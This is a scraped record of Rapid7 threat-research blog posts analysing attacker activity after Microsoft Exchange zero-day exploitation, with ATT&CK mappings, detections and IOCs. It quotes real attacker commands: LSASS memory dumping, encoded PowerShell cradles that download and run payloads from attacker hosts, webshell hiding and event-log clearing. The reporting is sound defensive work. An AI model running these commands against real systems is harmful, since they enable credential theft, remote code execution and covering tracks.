[T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/ /zfwqn \nURL | http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack . Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 